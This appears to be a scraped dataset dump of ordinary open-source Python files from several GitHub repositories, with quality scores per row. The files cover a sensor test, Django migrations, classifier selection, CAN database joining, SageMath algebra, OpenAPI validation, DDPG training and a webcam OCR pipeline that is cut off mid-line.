Column               | Type    | Value range
---------------------|---------|------------------
max_stars_repo_path  | string  | lengths 4 to 197
max_stars_repo_name  | string  | lengths 6 to 120
max_stars_count      | int64   | 0 to 191k
id                   | string  | lengths 1 to 8
content              | string  | lengths 6 to 964k
score                | float64 | -0.88 to 3.95
int_score            | int64   | 0 to 4
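As a rough, hedged illustration only (not part of the original dump): the sketch below shows how a dataset with the columns above could be loaded and filtered using the Hugging Face `datasets` library. The dataset path, split name, and score threshold are placeholders, not values taken from this document.

# Minimal sketch, assuming a Hugging Face-style dataset with the columns listed above.
# "path/to/dataset" and the threshold of 2 are hypothetical placeholders.
from datasets import load_dataset

ds = load_dataset("path/to/dataset", split="train")

# Keep rows whose integer quality score (int_score, range 0-4) is at least 2.
high_quality = ds.filter(lambda row: row["int_score"] >= 2)

# Inspect a few rows: repo, path, stars, score, and the start of the file content.
for row in high_quality.select(range(3)):
    print(row["max_stars_repo_name"], row["max_stars_repo_path"],
          row["max_stars_count"], row["score"])
    print(row["content"][:200])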
examples/ex1_ezo_rtd.py
MartyTerra/EZO-RTD
0
12746155
<gh_stars>0
import machine
import time
import ezo_rtd

print("MSG: Start of Atlas Scientific EZO-RTD self test")

i2c = machine.I2C(scl=machine.Pin(22), sda=machine.Pin(23))
atlas = ezo_rtd.EZO_RTD_I2C(i2c)

while True:
    print(atlas.celcius)

print("MSG: End of Atlas Scientific EZO-RTD self test")
1.007813
1
orchestra/migrations/0037_add_fields_to_iteration.py
code-review-doctor/orchestra
444
12746283
<filename>orchestra/migrations/0037_add_fields_to_iteration.py<gh_stars>100-1000
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-04-14 21:18
from __future__ import unicode_literals

import django.utils.timezone
from django.db import migrations
from django.db import models


class Migration(migrations.Migration):

    dependencies = [
        ('orchestra', '0036_remove_taskassignment_snapshots'),
    ]

    operations = [
        migrations.AddField(
            model_name='iteration',
            name='created_at',
            field=models.DateTimeField(default=django.utils.timezone.now),
        ),
        migrations.AddField(
            model_name='iteration',
            name='is_deleted',
            field=models.BooleanField(default=False),
        ),
    ]
0.800781
1
deslib/dcs/base.py
qhduan/DESlib
0
12746411
<gh_stars>0 from abc import ABCMeta import numpy as np from deslib.base import DS from deslib.util.aggregation import majority_voting_rule, predict_proba_ensemble class DCS(DS): """Base class for a Dynamic Classifier Selection (dcs) method. All dynamic classifier selection classes should inherit from this class. Warning: This class should not be used directly, use derived classes instead. Parameters ---------- pool_classifiers : list of classifiers The generated_pool of classifiers trained for the corresponding classification problem. The classifiers should support methods "predict" and "predict_proba". k : int (Default = 7) Number of neighbors used to estimate the competence of the base classifiers. DFP : Boolean (Default = False) Determines if the dynamic frienemy pruning is applied. with_IH : Boolean (Default = False) Whether the hardness level of the region of competence is used to decide between using the DS algorithm or the KNN for classification of a given query sample. safe_k : int (default = None) The size of the indecision region. IH_rate : float (default = 0.3) Hardness threshold. If the hardness level of the competence region is lower than the IH_rate the KNN classifier is used. Otherwise, the DS algorithm is used for classification. selection_method : String (Default = "best") Determines which method is used to select the base classifier after the competences are estimated. diff_thresh : float (Default = 0.1) Threshold to measure the difference between the competence level of the base classifiers for the random and diff selection schemes. If the difference is lower than the threshold, their performance are considered equivalent. rng : numpy.random.RandomState instance Random number generator to assure reproducible results. References ---------- Woods, <NAME>. <NAME>, and <NAME>. "Combination of multiple classifiers using local accuracy estimates." IEEE transactions on pattern analysis and machine intelligence 19.4 (1997): 405-410. Britto, <NAME>., <NAME>, and <NAME>. "Dynamic selection of classifiers—a comprehensive review." Pattern Recognition 47.11 (2014): 3665-3680. <NAME> and <NAME>, Methods for Dynamic Classifier Selection 10th Int. Conference on Image Analysis and Proc., Venice, Italy (1999), 659-664. <NAME>, <NAME>, and <NAME>, “Dynamic classifier selection: Recent advances and perspectives,” Information Fusion, vol. 41, pp. 195 – 216, 2018. """ __metaclass__ = ABCMeta def __init__(self, pool_classifiers, k=7, DFP=False, safe_k=None, with_IH=False, IH_rate=0.30, selection_method='best', diff_thresh=0.1, rng=np.random.RandomState()): if not isinstance(selection_method, str): raise TypeError('The parameter selection_method should be a string.' ' selection_method = ', type(selection_method)) selection_method = selection_method.lower() if selection_method not in ['best', 'all', 'random', 'diff']: raise ValueError('Invalid value for parameter "selection_method." The possible values are: ' '"best", "all", "random", "diff"') if not isinstance(diff_thresh, float): raise TypeError('The parameter diff_thresh should be a float. diff_thresh = ', diff_thresh) if diff_thresh >= 0.5 or diff_thresh < 0.0 or np.isnan(diff_thresh): raise ValueError('diff_thresh should be lower than 0.5. 
diff_thresh = ', diff_thresh) super(DCS, self).__init__(pool_classifiers, k, DFP=DFP, with_IH=with_IH, safe_k=safe_k, IH_rate=IH_rate) self.selection_method = selection_method self.diff_thresh = diff_thresh self.rng = rng def estimate_competence(self, query, predictions=None): """estimate the competence of each base classifier for the classification of the query sample. Parameters ---------- query : array containing the test sample = [n_features] predictions : array of shape = [n_samples, n_classifiers] Contains the predictions of all base classifier for all samples in the query array Returns ------- competences : array of shape = [n_classifiers] The competence level estimated for each base classifier in the pool """ pass def select(self, competences): """Select the most competent classifier for the classification of the query sample given the competence level estimates. Four selection schemes are available. Best : The base classifier with the highest competence level is selected. In cases where more than one base classifier achieves the same competence level, the one with the lowest index is selected. This method is the standard for the LCA, OLA, MLA techniques. Diff : Select the base classifier that is significantly better than the others in the pool (when the difference between its competence level and the competence level of the other base classifiers is higher than a predefined threshold). If no base classifier is significantly better, the base classifier is selected randomly among the member with equivalent competence level. Random : Selects a random base classifier among all base classifiers that achieved the same competence level. ALL : all base classifiers with the max competence level estimates are selected (note that in this case the dcs technique becomes a des). Parameters ---------- competences : array = [n_classifiers] containing the estimated competence level for the base classifiers Returns ------- selected_clf : index of the selected base classifier(s) """ selected_clf = [] best_index = np.argmax(competences) if self.selection_method == 'best': # Select the classifier with highest competence level selected_clf = best_index elif self.selection_method == 'diff': """Selects a base classifier if its competence level is significant better than the rest. If there is no such classifier, select randomly a base model. the best classifier will always have diff < diff_thresh. In a case it is superior than all others, it will be the only member selected. Otherwise, a random classifier from this list is selected """ best_competence = np.max(competences) diff = best_competence - competences indices = [idx for idx, _ in enumerate(diff) if diff[idx] < self.diff_thresh] if len(indices) == 0: indices = range(self.n_classifiers) selected_clf = self.rng.choice(indices) elif self.selection_method == 'random': # Select a random classifier among all with same competence level indices = [idx for idx, competence in enumerate(competences) if competence == competences[best_index]] selected_clf = self.rng.choice(indices) elif self.selection_method == 'all': # select all base classifiers with max competence estimates. selected_clf = [idx for idx, competence in enumerate(competences) if competence == competences[best_index]] return selected_clf def classify_instance(self, query, predictions): """Predicts the class label of the corresponding query sample. If self.mode == "all", the majority voting scheme is used to aggregate the predictions of all classifiers with the max competence level estimate. 
Parameters ---------- query : array containing the test sample = [n_samples, n_features] predictions : array of shape = [n_samples, n_classifiers] Contains the predictions of all base classifier for all samples in the query array Returns ------- The predicted label of the query """ competences = self.estimate_competence(query, predictions=predictions) if self.selection_method != 'all': # only one classifier is selected clf_index = self.select(competences) predicted_label = predictions[clf_index] else: # Selected ensemble of classifiers is combined using Majority Voting indices = self.select(competences) votes = np.atleast_2d(predictions[indices]) predicted_label = majority_voting_rule(votes) return predicted_label def predict_proba_instance(self, query): """Predicts the posterior probabilities of the corresponding query sample. If self.mode == "all", get the probability estimates of the selected ensemble. Otherwise, the technique gets the probability estimates from the selected base classifier Parameters ---------- query : array containing the test sample = [n_features] Returns ------- predicted_proba : array = [n_classes] with the probability estimates for all classes """ competences = self.estimate_competence(query) if self.selection_method != 'all': # only one classifier is selected clf_index = self.select(competences) predicted_proba = self.pool_classifiers[clf_index].predict_proba(query) else: # Selected ensemble of classifiers is combined using Majority Voting indices = self.select(competences) classifier_ensemble = self._get_classifier_ensemble(indices) predicted_proba = predict_proba_ensemble(classifier_ensemble, query) return predicted_proba
2.265625
2
canmatrix/join.py
pierreluctg/canmatrix
0
12746539
import canmatrix.formats
from canmatrix.canmatrix import CanId


def list_pgn(db):
    """
    :param db:
    :return: pgn and id
    """
    id = [x.Id for x in db.frames]
    r = [CanId(t).tuples() for t in id]
    return [t[1] for t in r], id


def ids_sharing_same_pgn(id_x, pgn_x, id_y, pgn_y):
    for idx, pgnx in zip(id_x, pgn_x):
        for idy, pgny in zip(id_y, pgn_y):
            if pgnx == pgny:
                yield (idx, idy)


def join_frame_by_signal_startbit(files):
    targetDb = next(iter(canmatrix.formats.loadp(files.pop(0)).values()))
    pgn_x, id_x = list_pgn(db=targetDb)
    for f in files:
        sourceDb = next(iter(canmatrix.formats.loadp(f).values()))
        pgn_y, id_y = list_pgn(db=sourceDb)
        same_pgn = ids_sharing_same_pgn(id_x, pgn_x, id_y, pgn_y)
        for idx, idy in same_pgn:
            # print("{0:#x} {1:#x}".format(idx, idy))
            targetFr = targetDb.frameById(idx)
            sourceFr = sourceDb.frameById(idy)
            to_add = []
            for sig_t in targetFr.signals:
                for sig_s in sourceFr.signals:
                    # print(sig.name)
                    if sig_t.startbit == sig_s.startbit:
                        # print("\t{0} {1}".format(sig_t.name, sig_s.name))
                        to_add.append(sig_s)
            for s in to_add:
                targetFr.addSignal(s)
    return targetDb


def renameFrameWithID(sourceDb):
    for frameSc in sourceDb.frames:
        _, pgn, sa = CanId(frameSc.Id).tuples()
        exten = "__{pgn:#04X}_{sa:#02X}_{sa:03d}d".format(pgn=pgn, sa=sa)
        new_name = frameSc.name + exten
        # print(new_name)
        frameSc.name = new_name


def renameFrameWithSAEacronyme(sourceDb, targetDb):
    pgn_x, id_x = list_pgn(db=targetDb)
    pgn_y, id_y = list_pgn(db=sourceDb)
    same_pgn = ids_sharing_same_pgn(id_x, pgn_x, id_y, pgn_y)
    for idx, idy in same_pgn:
        targetFr = targetDb.frameById(idx)
        sourceFr = sourceDb.frameById(idy)
        new_name = sourceFr.name + "__" + targetFr.name
        targetFr.name = new_name


def join_frame_for_manufacturer(db, files):
    # targetDb = next(iter(im.importany(files.pop(0)).values()))
    pgn_x, id_x = list_pgn(db=db)
    for f in files:
        sourceDb = next(iter(canmatrix.formats.loadp(f).values()))
        pgn_y, id_y = list_pgn(db=sourceDb)
        same_pgn = ids_sharing_same_pgn(id_x, pgn_x, id_y, pgn_y)
        for idx, idy in same_pgn:
            # print("{0:#x} {1:#x}".format(idx, idy))
            targetFr = db.frameById(idx)
            sourceFr = sourceDb.frameById(idy)
            _, pgn, sa = CanId(targetFr.Id).tuples()
            if sa < 128:
                print('less', targetFr.name)
            to_add = []
            for sig_s in sourceFr.signals:
                new_name = "{name}_{pgn:#04x}_{sa:03}".format(
                    name=sig_s.name, pgn=pgn, sa=sa)
                sig_s.name = new_name
                to_add.append(sig_s)
            for s in to_add:
                targetFr.addSignal(s)
1.132813
1
nodeconductor/cost_tracking/migrations/0011_applicationtype_slug.py
p-p-m/nodeconductor
0
12746667
<reponame>p-p-m/nodeconductor<gh_stars>0
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import models, migrations
from django.template.defaultfilters import slugify


def init_application_types_slugs(apps, schema_editor):
    ApplicationType = apps.get_model("cost_tracking", "ApplicationType")
    for at in ApplicationType.objects.all():
        at.slug = slugify(at.name)
        at.save()


class Migration(migrations.Migration):

    dependencies = [
        ('cost_tracking', '0010_applicationtype'),
    ]

    operations = [
        migrations.AddField(
            model_name='applicationtype',
            name='slug',
            field=models.CharField(max_length=150, blank=True),
            preserve_default=True,
        ),
        migrations.RunPython(init_application_types_slugs),
        migrations.AlterField(
            model_name='applicationtype',
            name='slug',
            field=models.CharField(unique=True, max_length=150),
            preserve_default=True,
        ),
    ]
1.085938
1
cnn_src/eval_data_helpers.py
sefira/question-classification-cnn-rnn-attention
32
12746795
<filename>cnn_src/eval_data_helpers.py
#! /usr/bin/env python

import logging
import os.path
import sys
import jieba
import re
import numpy as np  # used by batch_iter

logging.basicConfig(format='%(asctime)s: %(levelname)s: %(message)s')
logging.root.setLevel(level=logging.INFO)
logger = logging.getLogger()


def process_data(line):
    """
    word break and remove word
    Returns split sentences
    """
    # Word break
    seg_list = jieba.cut(line)
    line = u' '.join(seg_list)
    # Remove word
    ss = re.findall('[\n\s*\r\u4e00-\u9fa5]|nmovie|nrcelebrity', line)
    line = u"".join(ss).strip()
    if len(line) < 2:
        return "UNK"
    return line


def load_data(eval_data_file):
    eval_data = list(open(eval_data_file, "r").readlines())
    row_data = [s.strip().split("\t") for s in eval_data]
    X = [process_data(item[0]) for item in row_data]
    Y = [int(item[1]) for item in row_data]
    return [len(X), X, Y]


def batch_iter(data, batch_size, num_epochs, shuffle=True):
    """
    Generates a batch iterator for a dataset.
    """
    data = np.array(data)
    data_size = len(data)
    num_batches_per_epoch = int((len(data) - 1) / batch_size) + 1
    for epoch in range(num_epochs):
        # Shuffle the data at each epoch
        if shuffle:
            shuffle_indices = np.random.permutation(np.arange(data_size))
            shuffled_data = data[shuffle_indices]
        else:
            shuffled_data = data
        for batch_num in range(num_batches_per_epoch):
            start_index = batch_num * batch_size
            end_index = min((batch_num + 1) * batch_size, data_size)
            yield shuffled_data[start_index:end_index]
1.984375
2
src/sage/algebras/lie_conformal_algebras/weyl_lie_conformal_algebra.py
UCD4IDS/sage
0
12746923
<reponame>UCD4IDS/sage<gh_stars>0 r""" Weyl Lie Conformal Algebra Given a commutative ring `R`, a free `R`-module `M` and a non-degenerate, skew-symmetric, bilinear pairing `\langle \cdot,\cdot\rangle: M \otimes_R M \rightarrow R`. The *Weyl* Lie conformal algebra associated to this datum is the free `R[T]`-module generated by `M` plus a central vector `K`. The non-vanishing `\lambda`-brackets are given by: .. MATH:: [v_\lambda w] = \langle v, w\rangle K. This is not an H-graded Lie conformal algebra. The choice of a Lagrangian decomposition `M = L \oplus L^*` determines an H-graded structure. For this H-graded Lie conformal algebra see the :mod:`Bosonic Ghosts Lie conformal algebra<sage.algebras.\ lie_conformal_algebras.bosonic_ghosts_lie_conformal_algebra>` AUTHORS: - <NAME> (2019-08-09): Initial implementation. """ #****************************************************************************** # Copyright (C) 2019 <NAME> <<EMAIL>> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 2 of the License, or # (at your option) any later version. # http://www.gnu.org/licenses/ #***************************************************************************** from .lie_conformal_algebra_with_structure_coefs import \ LieConformalAlgebraWithStructureCoefficients from sage.matrix.special import identity_matrix from sage.structure.indexed_generators import standardize_names_index_set class WeylLieConformalAlgebra(LieConformalAlgebraWithStructureCoefficients): r""" The Weyl Lie conformal algebra. INPUT: - ``R`` -- a commutative ring; the base ring of this Lie conformal algebra. - ``ngens``: an even positive Integer (default `2`); The number of non-central generators of this Lie conformal algebra. - ``gram_matrix``: a matrix (default: ``None``); A non-singular skew-symmetric square matrix with coefficients in `R`. - ``names`` -- a list or tuple of ``str``; alternative names for the generators - ``index_set`` -- an enumerated set; alternative indexing set for the generators OUTPUT: The Weyl Lie conformal algebra with generators `\alpha_i`, `i=1,...,ngens` and `\lambda`-brackets .. MATH:: [{\alpha_i}_{\lambda} \alpha_j] = M_{ij} K, where `M` is the ``gram_matrix`` above. .. NOTE:: The returned Lie conformal algebra is not `H`-graded. For a related `H`-graded Lie conformal algebra see :class:`BosonicGhostsLieConformalAlgebra<sage.algebras.\ lie_conformal_algebras.bosonic_ghosts_lie_conformal_algebra\ .BosonicGhostsLieConformalAlgebra>`. EXAMPLES:: sage: lie_conformal_algebras.Weyl(QQ) The Weyl Lie conformal algebra with generators (alpha0, alpha1, K) over Rational Field sage: R = lie_conformal_algebras.Weyl(QQbar, gram_matrix=Matrix(QQ,[[0,1],[-1,0]]), names = ('a','b')) sage: R.inject_variables() Defining a, b, K sage: a.bracket(b) {0: K} sage: b.bracket(a) {0: -K} sage: R = lie_conformal_algebras.Weyl(QQbar, ngens=4) sage: R.gram_matrix() [ 0 0| 1 0] [ 0 0| 0 1] [-----+-----] [-1 0| 0 0] [ 0 -1| 0 0] sage: R.inject_variables() Defining alpha0, alpha1, alpha2, alpha3, K sage: alpha0.bracket(alpha2) {0: K} sage: R = lie_conformal_algebras.Weyl(QQ); R.category() Category of finitely generated Lie conformal algebras with basis over Rational Field sage: R in LieConformalAlgebras(QQ).Graded() False sage: R.inject_variables() Defining alpha0, alpha1, K sage: alpha0.degree() Traceback (most recent call last): ... 
AttributeError: 'WeylLieConformalAlgebra_with_category.element_class' object has no attribute 'degree' TESTS:: sage: lie_conformal_algebras.Weyl(ZZ, gram_matrix=identity_matrix(ZZ,3)) Traceback (most recent call last): ... ValueError: The gram_matrix should be a non degenerate skew-symmetric 3 x 3 matrix, got [1 0 0] [0 1 0] [0 0 1] """ def __init__(self,R,ngens=None, gram_matrix=None, names=None, index_set=None): """ Initialize self. TESTS:: sage: V = lie_conformal_algebras.Weyl(QQ) sage: TestSuite(V).run() """ from sage.matrix.matrix_space import MatrixSpace if ngens: try: from sage.rings.integer_ring import ZZ assert ngens in ZZ and ngens % 2 == 0 except AssertionError: raise ValueError("ngens needs to be an even positive "+ "Integer, got {}".format(ngens)) if (gram_matrix is not None): if ngens is None: ngens = gram_matrix.dimensions()[0] try: assert (gram_matrix in MatrixSpace(R,ngens,ngens)) except AssertionError: raise ValueError("The gram_matrix should be a skew-symmetric "+ "{0} x {0} matrix, got {1}".format(ngens,gram_matrix)) if (not gram_matrix.is_skew_symmetric()) or \ (gram_matrix.is_singular()): raise ValueError("The gram_matrix should be a non degenerate " + "skew-symmetric {0} x {0} matrix, got {1}"\ .format(ngens,gram_matrix)) elif (gram_matrix is None): if ngens is None: ngens = 2 A = identity_matrix(R, ngens // 2) from sage.matrix.special import block_matrix gram_matrix = block_matrix([[R.zero(),A],[-A,R.zero()]]) latex_names = None if (names is None) and (index_set is None): names = 'alpha' latex_names = tuple(r'\alpha_{%d}' % i for i in range(ngens)) + ('K',) names,index_set = standardize_names_index_set(names=names, index_set=index_set, ngens=ngens) weyldict = { (i,j): {0: {('K',0): gram_matrix[index_set.rank(i), index_set.rank(j)]}} for i in index_set for j in index_set} super(WeylLieConformalAlgebra,self).__init__(R,weyldict,names=names, latex_names=latex_names, index_set=index_set, central_elements=('K',)) self._gram_matrix = gram_matrix def _repr_(self): """ The name of this Lie conformal algebra. EXAMPLES:: sage: R = lie_conformal_algebras.Weyl(ZZ); R The Weyl Lie conformal algebra with generators (alpha0, alpha1, K) over Integer Ring """ return "The Weyl Lie conformal algebra with generators {} over {}"\ .format(self.gens(),self.base_ring()) def gram_matrix(self): r""" The Gram matrix that specifies the `\lambda`-brackets of the generators. EXAMPLES:: sage: R = lie_conformal_algebras.Weyl(QQbar, ngens=4) sage: R.gram_matrix() [ 0 0| 1 0] [ 0 0| 0 1] [-----+-----] [-1 0| 0 0] [ 0 -1| 0 0] """ return self._gram_matrix
1.617188
2
packages/service-library/src/servicelib/rest_validators.py
KZzizzle/osparc-simcore
0
12747051
from aiohttp import web
from openapi_core.validation.request.validators import RequestValidator
from openapi_core.validation.response.validators import ResponseValidator

from .openapi_wrappers import (
    PATH_KEY,
    QUERY_KEY,
    AiohttpOpenAPIRequest,
    AiohttpOpenAPIResponse,
)
from .rest_oas import OpenApiSpec, get_specs
from .rest_responses import create_error_response


class OpenApiValidator:
    """
    Used to validate data in the request->response cycle against openapi specs
    """

    @classmethod
    def create(cls, app: web.Application, _version=""):
        specs = get_specs(app)  # TODO: one per version!
        return cls(specs)

    def __init__(self, spec: OpenApiSpec):
        self._reqvtor = RequestValidator(spec, custom_formatters=None)
        self._resvtor = ResponseValidator(spec, custom_formatters=None)

        # Current
        self.current_request = None  # wrapper request

    async def check_request(self, request: web.Request):
        self.current_request = None

        rq = await AiohttpOpenAPIRequest.create(request)
        result = self._reqvtor.validate(rq)

        # keeps current request and reuses in response
        self.current_request = rq

        if result.errors:
            err = create_error_response(
                result.errors,
                "Failed request validation against API specs",
                web.HTTPBadRequest,
            )
            raise err

        path, query = [result.parameters[k] for k in (PATH_KEY, QUERY_KEY)]

        return path, query, result.body

    def check_response(self, response: web.Response):
        req = self.current_request
        res = AiohttpOpenAPIResponse(
            response, response.text
        )  # FIXME:ONLY IN SERVER side. Async in client!

        result = self._resvtor.validate(req, res)
        if result.errors:
            err = create_error_response(
                result.errors,
                "Failed response validation against API specs",
                web.HTTPServiceUnavailable,
            )
            raise err
1.695313
2
episode.py
RomDeffayet/DDPG_multi_agent
2
12747179
# -*- coding: utf-8 -*- """ Created on Wed Nov 14 14:28:11 2018 @author: <NAME> """ import numpy as np import numpy.random as rd import argparse from collections import deque import pickle import os from ddpg import Actor, Critic from make_env import make_env import torch dtype = torch.float device = torch.device("cuda") def ornsteinUhlenbeck(x_prev, mu, sigma = 0.3, theta = 0.15, dt = 0.01): mu = np.zeros_like(x_prev) n = np.size(x_prev) x = x_prev + theta*(mu - x_prev)*dt + sigma*np.sqrt(dt)*rd.normal(0, 1, n) return x def sample(buffer, N): if len(buffer) <= N: return buffer else: idx = rd.choice(len(buffer), N, replace = False) sample = [] for i in range(N): sample.append(buffer[idx[i]]) return sample def episode(n_episodes, buffer_size, N, learn, render, x0, mu, sigma, theta, dt, alpha, gamma, tau, init_actors = None, init_critics = None): actors, critics = [], [] for i in range(env.n): if init_actors is not None: actors = init_actors critics = init_critics else: actors.append(Actor(env.observation_space[i].shape[0], env.action_space[i].n)) critics.append(Critic(env.observation_space[i].shape[0], env.action_space[i].n, actors[i])) replay_buffer = deque() evolution = [] for ep in range(n_episodes): noise = x0 state = env.reset() ep_rewards = np.zeros(env.n) step_count = 0 done = np.array([False] * 4) while (not any(done) and step_count < 1000): if render: env.render() ###Choose an action and go to next state actions = [] for i in range(env.n): noise = ornsteinUhlenbeck(noise, mu, sigma, theta, dt) action = actors[i].forwardPass(state[i]).detach().numpy() actions.append(np.clip(action + noise, -2, 2)) next_state, rewards, done, _ = env.step(actions) rewards = np.asarray(rewards) - 500*np.asarray(done) ep_rewards += rewards if learn: ###Store in the replay buffer replay_buffer.append(np.array([state, actions, rewards, next_state])) if len(replay_buffer)>buffer_size: replay_buffer.popleft() ###Sample a minibatch from the buffer minibatch = sample(replay_buffer, N) ###Learn from this minibatch for i in range(env.n): critics[i].learn(minibatch, i) actors[i].learn(minibatch, i) ###Prepare for next step step_count +=1 state = next_state ep_rewards /= step_count print("Episode " + str(ep) + " : " + str(ep_rewards) + " in " + str(step_count) + " steps") evolution.append((ep_rewards, step_count)) return actors, critics, evolution if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--env', default='simple_tag_guided', type=str) parser.add_argument('--n_episodes', default=5000, type=int) parser.add_argument ('--learn', default=True, type=bool) parser.add_argument ('--render', default=False, type=bool) parser.add_argument ('--buffer_size', default=1000, type=int) parser.add_argument ('--minibatch_size', default=32, type=int) parser.add_argument ('--alpha', default=0.001, type=float) parser.add_argument ('--gamma', default=0.9, type=float) parser.add_argument ('--tau', default=0.01, type=float) parser.add_argument ('--ou_x0', default=0, type=float) parser.add_argument ('--ou_mu', default=0, type=float) parser.add_argument ('--ou_sigma', default=0.3, type=float) parser.add_argument ('--ou_theta', default=0.15, type=float) parser.add_argument ('--ou_dt', default=0.01, type=float) args = parser.parse_args() env = make_env(args.env) actors, critics, evolution = episode(n_episodes = args.n_episodes, buffer_size = args.buffer_size, N = args.minibatch_size, learn = args.learn, render = args.render, x0 = args.ou_x0 * np.ones(env.action_space[0].n), mu = args.ou_mu * 
np.ones(env.action_space[0].n), sigma = args.ou_sigma, theta = args.ou_theta, dt = args.ou_dt, alpha = args.alpha, gamma = args.gamma, tau = args.tau) pickle.dump(actors, open('actors','wb')) pickle.dump(critics, open('critics','wb')) pickle.dump(evolution, open('evolution','wb')) print(os.getcwd())
1.898438
2
main_online.py
RavenKiller/craft_moranv2
2
12747307
""" Copyright (c) 2019-present NAVER Corp. MIT License """ # -*- coding: utf-8 -*- import sys import os import time import argparse import torch import torch.nn as nn import torch.backends.cudnn as cudnn from torch.autograd import Variable from PIL import Image import cv2 from skimage import io import numpy as np import json import zipfile import tools.utils as utils import tools.dataset as dataset import tools.imgproc as imgproc import tools.craft_utils as craft_utils from models.craft import CRAFT from models.moran import MORAN import matplotlib.pyplot as plt from collections import OrderedDict def copyStateDict(state_dict): if list(state_dict.keys())[0].startswith("module"): start_idx = 1 else: start_idx = 0 new_state_dict = OrderedDict() for k, v in state_dict.items(): name = ".".join(k.split(".")[start_idx:]) new_state_dict[name] = v return new_state_dict def str2bool(v): return v.lower() in ("yes", "y", "true", "t", "1") def craft_net(net, image, text_threshold, link_threshold, low_text, cuda, poly, refine_net=None): t0 = time.time() # resize img_resized, target_ratio, size_heatmap = imgproc.resize_aspect_ratio(image, args.canvas_size, interpolation=cv2.INTER_LINEAR, mag_ratio=args.mag_ratio) ratio_h = ratio_w = 1 / target_ratio # preprocessing x = imgproc.normalizeMeanVariance(img_resized) x = torch.from_numpy(x).permute(2, 0, 1) # [h, w, c] to [c, h, w] x = Variable(x.unsqueeze(0)) # [c, h, w] to [b, c, h, w] if cuda: x = x.cuda() # forward pass with torch.no_grad(): y, feature = net(x) # make score and link map score_text = y[0,:,:,0].cpu().data.numpy() score_link = y[0,:,:,1].cpu().data.numpy() tmp1 = score_link.copy() tmp2 = score_text.copy() # Post-processing boxes, polys, rot_rects = craft_utils.getDetBoxes(score_text, score_link, text_threshold, link_threshold, low_text, False) # coordinate adjustment boxes = craft_utils.adjustResultCoordinates(boxes, ratio_w, ratio_h) rot_rects = craft_utils.adjustResultCoordinatesNew(rot_rects, ratio_w, ratio_h) # render results (optional) render_img = score_text.copy() render_img = np.hstack((render_img, score_link)) ret_score_text = imgproc.cvt2HeatmapImg(render_img) if args.show_time : print("\ninfer/postproc time : {:.3f}/{:.3f}".format(t0, t1)) return boxes, ret_score_text,rot_rects parser = argparse.ArgumentParser(description='CRAFT Text Detection') # CRAFT args parser.add_argument('--craft_trained_model', default='pretrained/craft_mlt_25k.pth', type=str, help='pretrained model') parser.add_argument('--img_path', default='test/1.jpg', type=str, help='folder path to input images') parser.add_argument('--text_threshold', default=0.7, type=float, help='text confidence threshold') parser.add_argument('--low_text', default=0.4, type=float, help='text low-bound score') parser.add_argument('--link_threshold', default=0.4, type=float, help='link confidence threshold') parser.add_argument('--cuda', default=True, type=str2bool, help='Use cuda for inference') parser.add_argument('--canvas_size', default=1280, type=int, help='image size for inference') parser.add_argument('--mag_ratio', default=1.5, type=float, help='image magnification ratio') parser.add_argument('--poly', default=False, action='store_true', help='enable polygon type') parser.add_argument('--show_time', default=False, action='store_true', help='show processing time') parser.add_argument('--refine', default=False, action='store_true', help='enable link refiner') parser.add_argument('--refiner_model', default='pretrained/craft_refiner_CTW1500.pth', type=str, help='pretrained 
refiner model') # moran parser.add_argument('--moran_path', default='pretrained/moran.pth', type=str, help='pretrained moran model') args = parser.parse_args() moran_path = args.moran_path alphabet = '0:1:2:3:4:5:6:7:8:9:a:b:c:d:e:f:g:h:i:j:k:l:m:n:o:p:q:r:s:t:u:v:w:x:y:z:$' if __name__ == '__main__': ################################################ # cv2 initialize ################################################ cap = cv2.VideoCapture(0) ################################################ # CRAFT loading part ################################################ # load net net = CRAFT() # initialize if args.cuda: net.load_state_dict(copyStateDict(torch.load(args.craft_trained_model))) else: net.load_state_dict(copyStateDict(torch.load(args.craft_trained_model, map_location='cpu'))) if args.cuda: net = net.cuda() net = torch.nn.DataParallel(net) cudnn.benchmark = False net.eval() ################################################ # MORAN loading part ################################################ cuda_flag = False if torch.cuda.is_available(): cuda_flag = True MORAN = MORAN(1, len(alphabet.split(':')), 256, 32, 100, BidirDecoder=True, CUDA=cuda_flag) MORAN = MORAN.cuda() else: MORAN = MORAN(1, len(alphabet.split(':')), 256, 32, 100, BidirDecoder=True, inputDataType='torch.FloatTensor', CUDA=cuda_flag) print('loading pretrained model from %s' % moran_path) if cuda_flag: state_dict = torch.load(moran_path) else: state_dict = torch.load(moran_path, map_location='cpu') MORAN_state_dict_rename = OrderedDict() for k, v in state_dict.items(): name = k.replace("module.", "") # remove `module.` MORAN_state_dict_rename[name] = v MORAN.load_state_dict(MORAN_state_dict_rename) for p in MORAN.parameters(): p.requires_grad = False MORAN.eval() while(cap.isOpened()): all_text = [] all_text_reverse = [] ################################################ # CRAFT processing part ################################################ # load data tik = time.time() ret, image = cap.read() # image = cv2.imread('test/1.jpg') image_raw = image.copy() bboxes, score_text,rot_rects = craft_net(net, image, args.text_threshold, args.link_threshold, args.low_text, args.cuda, args.poly) print("time1: ",time.time()-tik) # save text rectangles filename, file_ext = os.path.splitext(os.path.basename(args.img_path)) # 这个可以保存切分的图片 img_cuts = utils.saveSplitTextRects(image,rot_rects,save_file=False,save_prefix="rect_"+filename) print("time2: ",time.time()-tik) if not img_cuts: cv2.imshow('Capture', image) if cv2.waitKey(1) & 0xFF == ord('q'): break continue ############################################### # MORAN processing part ################################################ converter = utils.strLabelConverterForAttention(alphabet, ':') transformer = dataset.resizeNormalize((100, 32)) images = [transformer(Image.fromarray(img.astype('uint8')).convert('L')) for img in img_cuts] images = [Variable(img.view(1, *img.size())) for img in images] all_image = torch.cat(images,axis=0) if cuda_flag: all_image = all_image.cuda() text = torch.LongTensor(1 * 5) length = torch.IntTensor(1) text = Variable(text) length = Variable(length) # 从单张修改为多张,只需要改Length # 作者给的处理工具已经考虑了多个图片同时处理的情况 max_iter = 20 t, l = converter.encode('0'*max_iter) utils.loadData(text, t) utils.loadData(length, l) length = torch.ones(len(img_cuts))*20 length = length.int() output = MORAN(all_image, length, text, text, test=True, debug=False) preds, preds_reverse = output[0] _, preds = preds.max(1) _, preds_reverse = preds_reverse.max(1) sim_preds = converter.decode(preds.data, 
